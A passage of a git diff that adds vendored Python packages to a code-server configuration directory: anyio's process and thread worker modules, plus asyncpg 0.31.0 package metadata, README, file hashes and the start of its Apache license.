checkpoint_if_cancelled +from .streams.buffered import BufferedByteReceiveStream + +if sys.version_info >= (3, 11): + from typing import TypeVarTuple, Unpack +else: + from typing_extensions import TypeVarTuple, Unpack + +WORKER_MAX_IDLE_TIME = 300 # 5 minutes + +T_Retval = TypeVar("T_Retval") +PosArgsT = TypeVarTuple("PosArgsT") + +_process_pool_workers: RunVar[set[Process]] = RunVar("_process_pool_workers") +_process_pool_idle_workers: RunVar[deque[tuple[Process, float]]] = RunVar( + "_process_pool_idle_workers" +) +_default_process_limiter: RunVar[CapacityLimiter] = RunVar("_default_process_limiter") + + +async def run_sync( # type: ignore[return] + func: Callable[[Unpack[PosArgsT]], T_Retval], + *args: Unpack[PosArgsT], + cancellable: bool = False, + limiter: CapacityLimiter | None = None, +) -> T_Retval: + """ + Call the given function with the given arguments in a worker process. + + If the ``cancellable`` option is enabled and the task waiting for its completion is + cancelled, the worker process running it will be abruptly terminated using SIGKILL + (or ``terminateProcess()`` on Windows). + + :param func: a callable + :param args: positional arguments for the callable + :param cancellable: ``True`` to allow cancellation of the operation while it's + running + :param limiter: capacity limiter to use to limit the total amount of processes + running (if omitted, the default limiter is used) + :raises NoEventLoopError: if no supported asynchronous event loop is running in the + current thread + :return: an awaitable that yields the return value of the function. + + """ + + async def send_raw_command(pickled_cmd: bytes) -> object: + try: + await stdin.send(pickled_cmd) + response = await buffered.receive_until(b"\n", 50) + status, length = response.split(b" ") + if status not in (b"RETURN", b"EXCEPTION"): + raise RuntimeError( + f"Worker process returned unexpected response: {response!r}" + ) + + pickled_response = await buffered.receive_exactly(int(length)) + except BaseException as exc: + workers.discard(process) + try: + process.kill() + with CancelScope(shield=True): + await process.aclose() + except ProcessLookupError: + pass + + if isinstance(exc, get_cancelled_exc_class()): + raise + else: + raise BrokenWorkerProcess from exc + + retval = pickle.loads(pickled_response) + if status == b"EXCEPTION": + assert isinstance(retval, BaseException) + raise retval + else: + return retval + + # First pickle the request before trying to reserve a worker process + await checkpoint_if_cancelled() + request = pickle.dumps(("run", func, args), protocol=pickle.HIGHEST_PROTOCOL) + + # If this is the first run in this event loop thread, set up the necessary variables + try: + workers = _process_pool_workers.get() + idle_workers = _process_pool_idle_workers.get() + except LookupError: + workers = set() + idle_workers = deque() + _process_pool_workers.set(workers) + _process_pool_idle_workers.set(idle_workers) + get_async_backend().setup_process_pool_exit_at_shutdown(workers) + + async with limiter or current_default_process_limiter(): + # Pop processes from the pool (starting from the most recently used) until we + # find one that hasn't exited yet + process: Process + while idle_workers: + process, idle_since = idle_workers.pop() + if process.returncode is None: + stdin = cast(ByteSendStream, process.stdin) + buffered = BufferedByteReceiveStream( + cast(ByteReceiveStream, process.stdout) + ) + + # Prune any other workers that have been idle for WORKER_MAX_IDLE_TIME + # seconds or longer + now = current_time() + killed_processes: list[Process] = [] + while idle_workers: + if now - idle_workers[0][1] < WORKER_MAX_IDLE_TIME: + break + + process_to_kill, idle_since = idle_workers.popleft() + process_to_kill.kill() + workers.remove(process_to_kill) + killed_processes.append(process_to_kill) + + with CancelScope(shield=True): + for killed_process in killed_processes: + await killed_process.aclose() + + break + + workers.remove(process) + else: + command = [sys.executable, "-u", "-m", __name__] + process = await open_process( + command, stdin=subprocess.PIPE, stdout=subprocess.PIPE + ) + try: + stdin = cast(ByteSendStream, process.stdin) + buffered = BufferedByteReceiveStream( + cast(ByteReceiveStream, process.stdout) + ) + with fail_after(20): + message = await buffered.receive(6) + + if message != b"READY\n": + raise BrokenWorkerProcess( + f"Worker process returned unexpected response: {message!r}" + ) + + main_module_path = getattr(sys.modules["__main__"], "__file__", None) + pickled = pickle.dumps( + ("init", sys.path, main_module_path), + protocol=pickle.HIGHEST_PROTOCOL, + ) + await send_raw_command(pickled) + except (BrokenWorkerProcess, get_cancelled_exc_class()): + raise + except BaseException as exc: + process.kill() + raise BrokenWorkerProcess( + "Error during worker process initialization" + ) from exc + + workers.add(process) + + with CancelScope(shield=not cancellable): + try: + return cast(T_Retval, await send_raw_command(request)) + finally: + if process in workers: + idle_workers.append((process, current_time())) + + +def current_default_process_limiter() -> CapacityLimiter: + """ + Return the capacity limiter that is used by default to limit the number of worker + processes. + + :return: a capacity limiter object + + """ + try: + return _default_process_limiter.get() + except LookupError: + limiter = CapacityLimiter(os.cpu_count() or 2) + _default_process_limiter.set(limiter) + return limiter + + +def process_worker() -> None: + # Redirect standard streams to os.devnull so that user code won't interfere with the + # parent-worker communication + stdin = sys.stdin + stdout = sys.stdout + sys.stdin = open(os.devnull) + sys.stdout = open(os.devnull, "w") + + stdout.buffer.write(b"READY\n") + while True: + retval = exception = None + try: + command, *args = pickle.load(stdin.buffer) + except EOFError: + return + except BaseException as exc: + exception = exc + else: + if command == "run": + func, args = args + try: + retval = func(*args) + except BaseException as exc: + exception = exc + elif command == "init": + main_module_path: str | None + sys.path, main_module_path = args + del sys.modules["__main__"] + if main_module_path and os.path.isfile(main_module_path): + # Load the parent's main module but as __mp_main__ instead of + # __main__ (like multiprocessing does) to avoid infinite recursion + try: + spec = spec_from_file_location("__mp_main__", main_module_path) + if spec and spec.loader: + main = module_from_spec(spec) + spec.loader.exec_module(main) + sys.modules["__main__"] = main + except BaseException as exc: + exception = exc + try: + if exception is not None: + status = b"EXCEPTION" + pickled = pickle.dumps(exception, pickle.HIGHEST_PROTOCOL) + else: + status = b"RETURN" + pickled = pickle.dumps(retval, pickle.HIGHEST_PROTOCOL) + except BaseException as exc: + exception = exc + status = b"EXCEPTION" + pickled = pickle.dumps(exc, pickle.HIGHEST_PROTOCOL) + + stdout.buffer.write(b"%s %d\n" % (status, len(pickled))) + stdout.buffer.write(pickled) + + # Respect SIGTERM + if isinstance(exception, SystemExit): + raise exception + + +if __name__ == "__main__": + process_worker() diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/to_thread.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/to_thread.py new file mode 100755 index 0000000..4be5b71 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/to_thread.py @@ -0,0 +1,78 @@ +from __future__ import annotations + +__all__ = ( + "run_sync", + "current_default_thread_limiter", +) + +import sys +from collections.abc import Callable +from typing import TypeVar +from warnings import warn + +from ._core._eventloop import get_async_backend +from .abc import CapacityLimiter + +if sys.version_info >= (3, 11): + from typing import TypeVarTuple, Unpack +else: + from typing_extensions import TypeVarTuple, Unpack + +T_Retval = TypeVar("T_Retval") +PosArgsT = TypeVarTuple("PosArgsT") + + +async def run_sync( + func: Callable[[Unpack[PosArgsT]], T_Retval], + *args: Unpack[PosArgsT], + abandon_on_cancel: bool = False, + cancellable: bool | None = None, + limiter: CapacityLimiter | None = None, +) -> T_Retval: + """ + Call the given function with the given arguments in a worker thread. + + If the ``cancellable`` option is enabled and the task waiting for its completion is + cancelled, the thread will still run its course but its return value (or any raised + exception) will be ignored. + + :param func: a callable + :param args: positional arguments for the callable + :param abandon_on_cancel: ``True`` to abandon the thread (leaving it to run + unchecked on own) if the host task is cancelled, ``False`` to ignore + cancellations in the host task until the operation has completed in the worker + thread + :param cancellable: deprecated alias of ``abandon_on_cancel``; will override + ``abandon_on_cancel`` if both parameters are passed + :param limiter: capacity limiter to use to limit the total amount of threads running + (if omitted, the default limiter is used) + :raises NoEventLoopError: if no supported asynchronous event loop is running in the + current thread + :return: an awaitable that yields the return value of the function. + + """ + if cancellable is not None: + abandon_on_cancel = cancellable + warn( + "The `cancellable=` keyword argument to `anyio.to_thread.run_sync` is " + "deprecated since AnyIO 4.1.0; use `abandon_on_cancel=` instead", + DeprecationWarning, + stacklevel=2, + ) + + return await get_async_backend().run_sync_in_worker_thread( + func, args, abandon_on_cancel=abandon_on_cancel, limiter=limiter + ) + + +def current_default_thread_limiter() -> CapacityLimiter: + """ + Return the capacity limiter that is used by default to limit the number of + concurrent threads. + + :return: a capacity limiter object + :raises NoEventLoopError: if no supported asynchronous event loop is running in the + current thread + + """ + return get_async_backend().current_default_thread_limiter() diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/INSTALLER b/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/INSTALLER new file mode 100755 index 0000000..a1b589e --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/METADATA b/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/METADATA new file mode 100755 index 0000000..fd04670 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/METADATA @@ -0,0 +1,131 @@ +Metadata-Version: 2.4 +Name: asyncpg +Version: 0.31.0 +Summary: An asyncio PostgreSQL driver +Author-email: MagicStack Inc +License-Expression: Apache-2.0 +Project-URL: github, https://github.com/MagicStack/asyncpg +Keywords: database,postgres +Classifier: Development Status :: 5 - Production/Stable +Classifier: Framework :: AsyncIO +Classifier: Intended Audience :: Developers +Classifier: Operating System :: POSIX +Classifier: Operating System :: MacOS :: MacOS X +Classifier: Operating System :: Microsoft :: Windows +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Classifier: Programming Language :: Python :: 3.12 +Classifier: Programming Language :: Python :: 3.13 +Classifier: Programming Language :: Python :: 3.14 +Classifier: Programming Language :: Python :: Implementation :: CPython +Classifier: Programming Language :: Python :: Free Threading :: 2 - Beta +Classifier: Topic :: Database :: Front-Ends +Requires-Python: >=3.9.0 +Description-Content-Type: text/x-rst +License-File: LICENSE +Requires-Dist: async_timeout>=4.0.3; python_version < "3.11.0" +Provides-Extra: gssauth +Requires-Dist: gssapi; platform_system != "Windows" and extra == "gssauth" +Requires-Dist: sspilib; platform_system == "Windows" and extra == "gssauth" +Dynamic: license-file + +asyncpg -- A fast PostgreSQL Database Client Library for Python/asyncio +======================================================================= + +.. image:: https://github.com/MagicStack/asyncpg/workflows/Tests/badge.svg + :target: https://github.com/MagicStack/asyncpg/actions?query=workflow%3ATests+branch%3Amaster + :alt: GitHub Actions status +.. image:: https://img.shields.io/pypi/v/asyncpg.svg + :target: https://pypi.python.org/pypi/asyncpg + +**asyncpg** is a database interface library designed specifically for +PostgreSQL and Python/asyncio. asyncpg is an efficient, clean implementation +of PostgreSQL server binary protocol for use with Python's ``asyncio`` +framework. You can read more about asyncpg in an introductory +`blog post `_. + +asyncpg requires Python 3.9 or later and is supported for PostgreSQL +versions 9.5 to 18. Other PostgreSQL versions or other databases +implementing the PostgreSQL protocol *may* work, but are not being +actively tested. + + +Documentation +------------- + +The project documentation can be found +`here `_. + + +Performance +----------- + +In our testing asyncpg is, on average, **5x** faster than psycopg3. + +.. image:: https://raw.githubusercontent.com/MagicStack/asyncpg/master/performance.png?fddca40ab0 + :target: https://gistpreview.github.io/?0ed296e93523831ea0918d42dd1258c2 + +The above results are a geometric mean of benchmarks obtained with PostgreSQL +`client driver benchmarking toolbench `_ +in June 2023 (click on the chart to see full details). + + +Features +-------- + +asyncpg implements PostgreSQL server protocol natively and exposes its +features directly, as opposed to hiding them behind a generic facade +like DB-API. + +This enables asyncpg to have easy-to-use support for: + +* **prepared statements** +* **scrollable cursors** +* **partial iteration** on query results +* automatic encoding and decoding of composite types, arrays, + and any combination of those +* straightforward support for custom data types + + +Installation +------------ + +asyncpg is available on PyPI. When not using GSSAPI/SSPI authentication it +has no dependencies. Use pip to install:: + + $ pip install asyncpg + +If you need GSSAPI/SSPI authentication, use:: + + $ pip install 'asyncpg[gssauth]' + +For more details, please `see the documentation +`_. + + +Basic Usage +----------- + +.. code-block:: python + + import asyncio + import asyncpg + + async def run(): + conn = await asyncpg.connect(user='user', password='password', + database='database', host='127.0.0.1') + values = await conn.fetch( + 'SELECT * FROM mytable WHERE id = $1', + 10, + ) + await conn.close() + + asyncio.run(run()) + + +License +------- + +asyncpg is developed and distributed under the Apache 2.0 license. diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/RECORD b/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/RECORD new file mode 100755 index 0000000..c68fb65 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/RECORD @@ -0,0 +1,115 @@ +asyncpg-0.31.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +asyncpg-0.31.0.dist-info/METADATA,sha256=6_wrzxCAjX9RTCqcxrKtAFVVNEZ2fTxlHcbvo62M0R8,4412 +asyncpg-0.31.0.dist-info/RECORD,, +asyncpg-0.31.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +asyncpg-0.31.0.dist-info/WHEEL,sha256=VXvNKn6nFeCM45GEUrNLJOO_J_e-cNJphGt9rWFxyE0,113 +asyncpg-0.31.0.dist-info/licenses/LICENSE,sha256=2SItc_2sUJkhdAdu-gT0T2-82dVhVafHCS6YdXBCpvY,11466 +asyncpg-0.31.0.dist-info/top_level.txt,sha256=DdhVhpzCq49mykkHNag6i9zuJx05_tx4CMZymM1F8dU,8 +asyncpg/__init__.py,sha256=bzD31aMekbKR9waMXuAxIYFbmrQ-S1Mttjmru_sSjo8,647 +asyncpg/__pycache__/__init__.cpython-312.pyc,, +asyncpg/__pycache__/_asyncio_compat.cpython-312.pyc,, +asyncpg/__pycache__/_version.cpython-312.pyc,, +asyncpg/__pycache__/cluster.cpython-312.pyc,, +asyncpg/__pycache__/compat.cpython-312.pyc,, +asyncpg/__pycache__/connect_utils.cpython-312.pyc,, +asyncpg/__pycache__/connection.cpython-312.pyc,, +asyncpg/__pycache__/connresource.cpython-312.pyc,, +asyncpg/__pycache__/cursor.cpython-312.pyc,, +asyncpg/__pycache__/introspection.cpython-312.pyc,, +asyncpg/__pycache__/pool.cpython-312.pyc,, +asyncpg/__pycache__/prepared_stmt.cpython-312.pyc,, +asyncpg/__pycache__/serverversion.cpython-312.pyc,, +asyncpg/__pycache__/transaction.cpython-312.pyc,, +asyncpg/__pycache__/types.cpython-312.pyc,, +asyncpg/__pycache__/utils.cpython-312.pyc,, +asyncpg/_asyncio_compat.py,sha256=pXF_aF4o_AqxNql0sPnuGdoe5sSSwQxHpKWF6ShZTbo,2540 +asyncpg/_testbase/__init__.py,sha256=IzMqfgI5gtOxajneoeWyoI4NtmE5sp7S5dXmU0gwwB8,16499 +asyncpg/_testbase/__pycache__/__init__.cpython-312.pyc,, +asyncpg/_testbase/__pycache__/fuzzer.cpython-312.pyc,, +asyncpg/_testbase/fuzzer.py,sha256=3Uxdu0YXei-7JZMCuCI3bxKMdnbuossV-KC68GG-AS4,9804 +asyncpg/_version.py,sha256=DIxy-OSz203zJ1z-llM0b0YFnqQtPgPR9jOjCWlyutE,641 +asyncpg/cluster.py,sha256=s_HmtiEGJqJ6GQWa6_zmfe11fZ29OpOtMT6Ufcu-g0g,24476 +asyncpg/compat.py,sha256=ebs2IeJw82rY9m0ZCmOYUqry_2nF3zqTi3tsWP5FT2o,2459 +asyncpg/connect_utils.py,sha256=-kLsbKn6zO5ixgatHN3Av3FvkZrLIAXF-tpao_bmy5w,43438 +asyncpg/connection.py,sha256=6avVwVO8cM-tthIV8RFA6QdBwv7Vkp5XS2VI74CStIw,99069 +asyncpg/connresource.py,sha256=tBAidNpEhbDvrMOKQbwn3ZNgIVAtsVxARxTnwj5fk-Q,1384 +asyncpg/cursor.py,sha256=rKeSIJMW5mUpvsian6a1MLrLoEwbkYTZsmZtEgwFT6s,9160 +asyncpg/exceptions/__init__.py,sha256=FXUYDFQw9gxE3mVz99FmsldYxivLUMtTIhXzu5tZ7Pk,29157 +asyncpg/exceptions/__pycache__/__init__.cpython-312.pyc,, +asyncpg/exceptions/__pycache__/_base.cpython-312.pyc,, +asyncpg/exceptions/_base.py,sha256=u62xv69n4AHO1xr35FjdgZhYvqdeb_mkQKyp-ip_AyQ,9260 +asyncpg/introspection.py,sha256=0eRQtt0mKPGv8V2fnTSizC_vLuk8jbO1VwoiQ5SAcd4,9340 +asyncpg/pgproto/__init__.pxd,sha256=uUIkKuI6IGnQ5tZXtrjOC_13qjp9MZOwewKlrxKFzPY,213 +asyncpg/pgproto/__init__.py,sha256=uUIkKuI6IGnQ5tZXtrjOC_13qjp9MZOwewKlrxKFzPY,213 +asyncpg/pgproto/__pycache__/__init__.cpython-312.pyc,, +asyncpg/pgproto/__pycache__/types.cpython-312.pyc,, +asyncpg/pgproto/buffer.pxd,sha256=d-hqi81ZVLD16lT-NacaQXTYKCtE-RYxWJmZisliZV8,4542 +asyncpg/pgproto/buffer.pxi,sha256=zdk5rOOoenHpwwYXcEo-NyUcLgUv3QxA40JCXarKVsM,93 +asyncpg/pgproto/buffer.pyx,sha256=mcaNScr1jPI8kpxT9jfg_Nicy8JOjQv6WM2j5JNPoAA,25710 +asyncpg/pgproto/codecs/__init__.pxd,sha256=zHtFdDnGn8eDSPOTPw8JzD8w_OCJyqL0F6s9dR8Vz2Y,6130 +asyncpg/pgproto/codecs/bits.pyx,sha256=x4MMVRLotz9R8n81E0S3lQQk23AvLlODb2pe_NGYqCI,1475 +asyncpg/pgproto/codecs/bytea.pyx,sha256=ot-oFH-hzQ89EUWneHk5QDUxl2krKkpYE_nWklVHXWU,997 +asyncpg/pgproto/codecs/context.pyx,sha256=oYurToHnpZz-Q8kPzRORFS_RyV4HH5kscNKsZYPt4FU,623 +asyncpg/pgproto/codecs/datetime.pyx,sha256=wLcPVOoPMsI7P8VIuQRO7oyqhr8VRIrKMvDtSqjYSVo,12855 +asyncpg/pgproto/codecs/float.pyx,sha256=A6XXA2NdS82EENhADA35LInxLcJsRpXvF6JVme_6HCc,1031 +asyncpg/pgproto/codecs/geometry.pyx,sha256=DtRADwsifbzAZyACxakne2MVApcUNji8EyOgtKuoEaw,4665 +asyncpg/pgproto/codecs/hstore.pyx,sha256=sXwFn3uzypvPkYIFH0FykiW9RU8qRme2N0lg8UoB6kg,2018 +asyncpg/pgproto/codecs/int.pyx,sha256=4RuntTl_4-I7ekCSONK9y4CWFghUmaFGldXL6ruLgxM,4527 +asyncpg/pgproto/codecs/json.pyx,sha256=fs7d0sroyMM9UZW-mmGgvHtVG7MiBac7Inb_wz1mMRs,1454 +asyncpg/pgproto/codecs/jsonpath.pyx,sha256=bAXgTvPzQlkJdlHHB95CNl03J2WAd_iK3JsE1PXI2KU,833 +asyncpg/pgproto/codecs/misc.pyx,sha256=ul5HFobQ1H3shO6ThrSlkEHO1lvxOoqTnRej3UabKiQ,484 +asyncpg/pgproto/codecs/network.pyx,sha256=1oFM__xT5H3pIZrLyRqjNqrR6z1UNlqMOWGTGnsbOyw,3917 +asyncpg/pgproto/codecs/numeric.pyx,sha256=TAN5stFXzmEiyP69MDG1oXryPAFCyZmxHcqPc-vy7LM,10373 +asyncpg/pgproto/codecs/pg_snapshot.pyx,sha256=WGJ-dv7JXVufybAiuScth7KlXXLRdMqSKbtfT4kpVWI,1814 +asyncpg/pgproto/codecs/text.pyx,sha256=yHpJCRxrf2Pgmz1abYSgvFQDRcgCJN137aniygOo_ec,1516 +asyncpg/pgproto/codecs/tid.pyx,sha256=_9L8C9NSDV6Ehk48VV8xOLDNLVJz2R88EornZbHcq88,1549 +asyncpg/pgproto/codecs/uuid.pyx,sha256=XIydQCaPUlfz9MvVDOu_5BTHd1kSKmJ1r3kBpsfjfYE,855 +asyncpg/pgproto/consts.pxi,sha256=emui5kw362ivo2G15l8epVAA8m5eDlcbcrRn794_kew,282 +asyncpg/pgproto/cpythonx.pxd,sha256=B9fAfasXgoWN-Z-STGCxbu0sW-QR8EblCIbxlzPo0Uc,736 +asyncpg/pgproto/debug.pxd,sha256=SuLG2tteWe3cXnS0czRTTNnnm2QGgG02icp_6G_X9Yw,263 +asyncpg/pgproto/frb.pxd,sha256=B2s2dw-SkzfKWeLEWzVLTkjjYYW53pazPcVNH3vPxAk,1212 +asyncpg/pgproto/frb.pyx,sha256=7bipWSBXebweq3JBFlCvSwa03fIZGLkKPqWbJ8VFWFI,409 +asyncpg/pgproto/hton.pxd,sha256=Swx5ry82iWYO9Ok4fRa_b7cLSrIPyxNYlyXm-ncYweo,953 +asyncpg/pgproto/pgproto.cpython-312-x86_64-linux-gnu.so,sha256=NTdRB22nirJunzh0LxTilo0tt4TwIBn6OuKV3eDvhkc,3188448 +asyncpg/pgproto/pgproto.pxd,sha256=QUUxWiHKdKfFxdDT0czSvOFsA4b59MJRR6WlUbJFgPg,430 +asyncpg/pgproto/pgproto.pyi,sha256=vDsno93anu44CMa0TGTOcQSBT8mRXV-vvOH0v-kGCI0,411 +asyncpg/pgproto/pgproto.pyx,sha256=bK75qfRQlofzO8dDzJ2mHUE0wLeXSsc5SLeAGvyXSeE,1249 +asyncpg/pgproto/tohex.pxd,sha256=fQVaxBu6dBw2P_ROR8MSPVDlVep0McKi69fdQBLhifI,361 +asyncpg/pgproto/types.py,sha256=7Onq2d7i01PLjR199TdraZFB66CdgIEXYuHoQCT3jKU,12775 +asyncpg/pgproto/uuid.pyx,sha256=heUtr0KxJSSNQ92Wz9xYCHbuzS_uMHzqmJrEtKW_0cc,10243 +asyncpg/pool.py,sha256=q8cQHSnbR_8x---isjqk_o_FmSS9LICuNiKkICSvhM8,42368 +asyncpg/prepared_stmt.py,sha256=rLWS-YvCtxEgMWEIlbSgcuUcB39wzCoxfkzCE806Mac,9783 +asyncpg/protocol/__init__.py,sha256=fDWUanigffIYzRccQeD2nhQXekl0bNGvefJDcMiOE8I,359 +asyncpg/protocol/__pycache__/__init__.cpython-312.pyc,, +asyncpg/protocol/codecs/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +asyncpg/protocol/codecs/__pycache__/__init__.cpython-312.pyc,, +asyncpg/protocol/codecs/array.pyx,sha256=1S_6xdgxllG8_1Lb68XdPkH1QgF63gAAmjh091Q7Dyk,29486 +asyncpg/protocol/codecs/base.pxd,sha256=wSk_mmRGI-4echq_F-bj5Am33kd3cuUODFe5KgSLfME,6614 +asyncpg/protocol/codecs/base.pyx,sha256=58vw_sWBBPIRHLBACBUpUJ0geAREGDaS434-V_eBMUk,34460 +asyncpg/protocol/codecs/pgproto.pyx,sha256=5PDv1JT_nXbDbHtYVrGCcZN3CxzQdgwqlXT8GpyMamk,17175 +asyncpg/protocol/codecs/range.pyx,sha256=-P-acyY2e5TlEtjqbkeH28PYk-DGLxqbmzKDFGL5BbI,6359 +asyncpg/protocol/codecs/record.pyx,sha256=l17HPv3ZeZzvDMXmh-FTdOQ0LxqaQsge_4hlmnGaf6s,2362 +asyncpg/protocol/codecs/textutils.pyx,sha256=UmTt1Zs5N2oLVDMTSlSe1zAFt5q4_4akbXZoS6HSPO8,2011 +asyncpg/protocol/consts.pxi,sha256=VT7NLBpLgPUvcUbPflrX84I79JZiFg4zFzBK28nCRZo,381 +asyncpg/protocol/coreproto.pxd,sha256=77yJqaBMGWHmxyihZIFfyVgfzICF9jLwKSvtuCoE8rM,6215 +asyncpg/protocol/coreproto.pyx,sha256=G6HhC5sbsAFVNmNvvp8gFgaeTaVDRBRkfB8X0DXHYFA,41005 +asyncpg/protocol/cpythonx.pxd,sha256=VX71g4PiwXWGTY-BzBPm7S-AiX5ySRrY40qAggH-BIA,613 +asyncpg/protocol/encodings.pyx,sha256=rTjWPi-nMun7x8UYCkwsUN16pL5M5LPODYWI28nIKL4,1634 +asyncpg/protocol/pgtypes.pxi,sha256=4XVeMr1Y04QOJV9f76V2882nT1vmcK-8J4AhFw0eFOw,6918 +asyncpg/protocol/prepared_stmt.pxd,sha256=GhHzJgQMehpWg0i3XSmbkJH6G5nnnmdNCf2EU_gXhDY,1115 +asyncpg/protocol/prepared_stmt.pyx,sha256=f-YQVhV5trxNdnlyjHCjOmi9byP5mbP__eps_JamQts,13036 +asyncpg/protocol/protocol.cpython-312-x86_64-linux-gnu.so,sha256=oecLbiotWzaj1mpL0m8YlOgb5n9I_Jpq0kxctF6elN8,8949160 +asyncpg/protocol/protocol.pxd,sha256=yOVFbkD7mA8VK5IGIJ4dGTyvHKWZTQOFfCFNfdeUdK8,1927 +asyncpg/protocol/protocol.pyi,sha256=F3LFOSUEWZF5-XLpAkUomHflQT9ITm985J-HsN1QVO8,9108 +asyncpg/protocol/protocol.pyx,sha256=li4lQhO3PeulcvSy6_Gi4PJAUp3GHE9e-nqh6xtQ-QU,34473 +asyncpg/protocol/record.cpython-312-x86_64-linux-gnu.so,sha256=mjK7E05BF9dbEBdlLAIjrQvvWH3vHB-fANm2hOJIFus,135280 +asyncpg/protocol/record.pyi,sha256=KJ6nF9Ad5tz4Z8wEAye_rzjBNghyCXUh9PAOqW53jW0,741 +asyncpg/protocol/recordcapi.pxd,sha256=AkcjhRpPAmun1gmohKLwvalcqODvAEdUijnsK6wY6Lg,360 +asyncpg/protocol/scram.pxd,sha256=t_nkicIS_4AzxyHoq-aYUNrFNv8O0W7E090HfMAIuno,1299 +asyncpg/protocol/scram.pyx,sha256=nT_Rawg6h3OrRWDBwWN7lju5_hnOmXpwWFWVrb3l_dQ,14594 +asyncpg/protocol/settings.pxd,sha256=8DTwZ5mi0aAUJRWE6SUIRDhWFGFis1mj8lcA8hNFTL0,1066 +asyncpg/protocol/settings.pyx,sha256=yICjZF5FXwfmdxQBg-1qO0XbpLvZL11-c3aMbiwM7oo,3777 +asyncpg/serverversion.py,sha256=WwlqBJkXZHvvnFluubCjPoaX_7OqjR8QgiOe90w6C9E,2133 +asyncpg/transaction.py,sha256=uAJok6Shx7-Kdt5l4NX-GJtLxVJSPXTOJUryGdbIVG8,8497 +asyncpg/types.py,sha256=rvWDTt-ZF56HrAjtDlOe7aodldEmtTTCDo3l134VHVM,5512 +asyncpg/utils.py,sha256=Y0vATexoIHFkpWURlqnlUZUacc4F1iZJ9rWJ3654OnM,1495 diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/REQUESTED b/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/REQUESTED new file mode 100755 index 0000000..e69de29 diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/WHEEL b/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/WHEEL new file mode 100755 index 0000000..d3bb8ca --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: setuptools (80.9.0) +Root-Is-Purelib: false +Tag: cp312-cp312-manylinux_2_28_x86_64 + diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/licenses/LICENSE b/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/licenses/LICENSE new file mode 100755 index 0000000..d931386 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/licenses/LICENSE @@ -0,0 +1,204 @@ +Copyright (C) 2016-present the asyncpg authors and contributors. + + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + 